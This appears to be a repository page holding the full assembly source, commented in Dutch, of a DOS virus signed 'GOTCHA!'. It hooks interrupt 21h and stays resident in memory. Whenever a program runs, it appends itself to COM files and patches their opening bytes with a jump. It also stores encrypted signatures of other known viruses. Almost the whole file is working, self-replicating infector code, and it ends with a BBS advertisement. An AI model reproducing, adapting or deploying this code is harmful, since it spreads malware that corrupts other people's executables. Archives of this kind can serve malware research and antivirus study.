MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.gotcha4.asm

398 lines
13 KiB
NASM
Raw Normal View History

2021-01-12 23:44:11 +00:00
;****************************************************************************
;* stripped COM-versie
;* met signature's
;*
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
SIGNLEN equ signend - signature
FILELEN equ eind - begin
RESPAR equ (FILELEN/16) + 17
BUFLEN equ 08h
VERSION equ 4
.RADIX 16
;****************************************************************************
;* Opstart programma
;****************************************************************************
begin: xor bx,bx
mov cl,07h
crloop: call crypt
loop crloop
call install
int 20
;****************************************************************************
;* Data
;****************************************************************************
buffer db BUFLEN dup (?)
oi21 dw ?,?
oldlen dw ?
handle dw ?
sign db 0
;****************************************************************************
;* Interupt handler 21
;****************************************************************************
ni21: pushf
cmp ax,4B00h
jne ni_verder
push es
push ds
push ax
push bx
push cx
push dx
call attach
mov cl,[sign]
call crypt
inc cl
and cl,07h
mov [sign],cl
call crypt
pop dx
pop cx
pop bx
pop ax
pop ds
pop es
exit: popf
jmp dword ptr cs:[oi21] ;naar oude int-handler
ni_verder: cmp ax,0DADAh
jne exit
mov ax,0A500h+VERSION
popf
iret
;****************************************************************************
;* plakt programma aan file (ASCIIZ DS:DX)
;****************************************************************************
attach: cld
mov ax,3D02h ;open de file
int 21
jc finnish
push cs
pop ds
mov [handle],ax ;bewaar file-handle
call eindptr ;bepaal lengte
jc finnish
mov [oldlen],ax
sub ax,SIGNLEN ;pointer naar eind - SIGNLEN
sbb dx,0
mov cx,dx
mov dx,ax
mov al,00h
call ptrmov
jc finnish
mov cx,SIGNLEN ;lees de laatse bytes
mov dx,offset buffer
call flread
jc finnish
verder3: push cs ;vergelijk signature met buffer
pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
or cx,cx
jz finnish
call beginptr ;lees begin van file
mov cx,BUFLEN
mov dx,offset buffer
call flread
jc finnish
cmp word ptr [buffer],5A4Dh
jz finnish
call writeprog ;schrijf programma naar file
jc finnish
mov ax,[oldlen] ;bereken call-adres
add ax,offset entry
sub ax,0103
mov byte ptr [buffer],0E9h
mov word ptr [buffer+1],ax
call beginptr ;pas begin van file aan
mov cx,BUFLEN
mov dx,offset buffer
call flwrite
jc finnish
finnish: mov bx,[handle] ;sluit de file
mov ah,3Eh
int 21
ret
;****************************************************************************
;* Crypt een signature
;****************************************************************************
crypt: push cx
mov al,14h
mul cl
add ax,offset virsig
mov si,ax
mov di,ax
push cs
push cs
pop ds
pop es
mov cx,0Ah
cryploop: lodsw
xor ax,0FFFFh
stosw
loop cryploop
pop cx
ret
;****************************************************************************
;* Schrijf programma naar file
;****************************************************************************
writeprog: call eindptr
mov cx,FILELEN
mov dx,offset begin
call flwrite
ret
;****************************************************************************
;* Subroutines voor file-pointer
;****************************************************************************
beginptr: mov al,00h ;naar begin van de file
xor cx,cx
xor dx,dx
jmp ptrmov
eindptr: mov al,02h ;naar eind van de file
xor cx,cx
xor dx,dx
; jmp ptrmov
ptrmov: mov ah,42h
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Subroutines voor lezen/schrijven
;****************************************************************************
flwrite: push cs
pop ds
mov ah,40h
mov bx,[handle]
int 21
ret
flread: push cs
pop ds
mov ah,3Fh
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Activering vanuit file
;****************************************************************************
entry: call entry2
entry2: pop bx
sub bx,offset entry2 ;CS:BX is begin programma - 100
cld
mov ax,bx ;copieer oude begin terug
add ax,offset buffer
mov si,ax
mov di,0100
mov cx,BUFLEN
rep movsb
mov ax,0100h
push ax
entcall: mov ax,0DADAh ;kijk of al geinstalleerd
int 21h
cmp ah,0A5h
je entstop
call install ;installeer het programma
entstop: ret
;****************************************************************************
;* Installatie in het geheugen
;****************************************************************************
install: push ds
push es
xor ax,ax ;haal oude vector
mov es,ax
mov cx,word ptr es:0084h
mov dx,word ptr es:0086h
mov [bx+offset oi21],cx
mov [bx+offset oi21+2],dx
mov ax,ds ;pas geheugen-grootte aan
dec ax
mov es,ax
cmp byte ptr es:[0000h],5Ah
jnz cancel
mov ax,es:[0003h]
sub ax,RESPAR
jb cancel
mov es:[0003h],ax
sub es:[0012h], word ptr RESPAR
mov es,es:[0012h] ;copieer programma naar top
mov ax,bx
add ax,0100
mov si,ax
mov di,0100h
mov cx,FILELEN
rep movsb
mov dx,offset ni21 ;zet nieuwe vector
push es
pop ds
mov ax,2521h
int 21h
cancel: pop es
pop ds
ret
;****************************************************************************
;* Tekst en Signature
;****************************************************************************
virsig:
;SYSLOCK Virus
db 0D1h, 0E9h, 8Ah, 0E1h
db 8Ah, 0C1h, 33h, 06h
db 14h, 00h, 31h, 04h
db 46h, 46h, 0E2h, 0F2h
db 5Eh, 59h, 58h, 0C3h
;Sylvia Virus
db 8Dh, 36h, 03h, 01h
db 33h, 0C9h, 33h, 0C0h
db 0ACh, 3Ch, 1Ah, 74h
db 04h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;DATACRIME IIb Virus
db 2Eh, 8Ah, 07h, 32h
db 0C2h, 0D0h, 0CAh, 2Eh
db 88h, 07h, 43h, 0E2h
db 0F3h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Yankee-Go-Home Virus (Enigma)
db 0D8h, 0Eh, 1Fh, 0BEh
db 37h, 08h, 81h, 0EEh
db 03h, 01h, 03h, 0F3h
db 89h, 04h, 0BEh, 39h
db 08h, 81h, 0EEh, 03h
;Slowdown Virus
db 0DEh, 90h, 90h, 81h
db 0C6h, 1Bh, 00h, 0B9h
db 90h, 06h, 2Eh, 80h
db 34h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Scotts Valley Virus
db 5Eh, 8Bh, 0DEh, 90h
db 90h, 81h, 0C6h, 32h
db 00h, 0B9h, 12h, 08h
db 2Eh, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Tiny-2A related Virus
db 0A5h, 8Eh, 0C1h, 0A6h
db 74h, 12h, 4Eh, 4Fh
db 0F3h, 0A5h, 8Eh, 0C1h
db 93h, 91h, 91h, 26h
db 87h, 85h, 0E0h, 0FEh
;DATACRIME 1280 Virus
db 8Bh, 36h, 01h, 01h
db 83h, 0EEh, 03h, 8Bh
db 0C6h, 3Dh, 00h, 00h
db 75h, 03h, 0E9h, 02h
db 01h, 90h, 90h, 90h
;;July13 Virus
; db 0A0h, 12h, 00h, 34h
; db 90h, 0BEh, 12h, 00h
; db 0B9h, 0B1h, 04h, 2Eh
; db 30h, 04h, 46h, 0E2h
; db 0FAh, 90h, 90h, 90h
;;XA1 Virus (Tannenbaum)
;virsig: db 0FAh, 8Bh, 0ECh, 58h
; db 32h, 0C0h, 89h, 46h
; db 02h, 81h, 46h, 00h
; db 28h, 00h, 90h, 90h
; db 90h, 90h, 90h, 90h
;;Twelve Tricks Trojan Dropper
; db 0BEh, 64h, 02h, 31h
; db 94h, 42h, 01h, 0D1h
; db 0C2h, 4Eh, 79h, 0F7h
; db 90h, 90h, 90h, 90h
; db 90h, 90h, 90h, 90h
signature: db 'GOTCHA!',0
signend:
eind:
cseg ends
end begin

; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>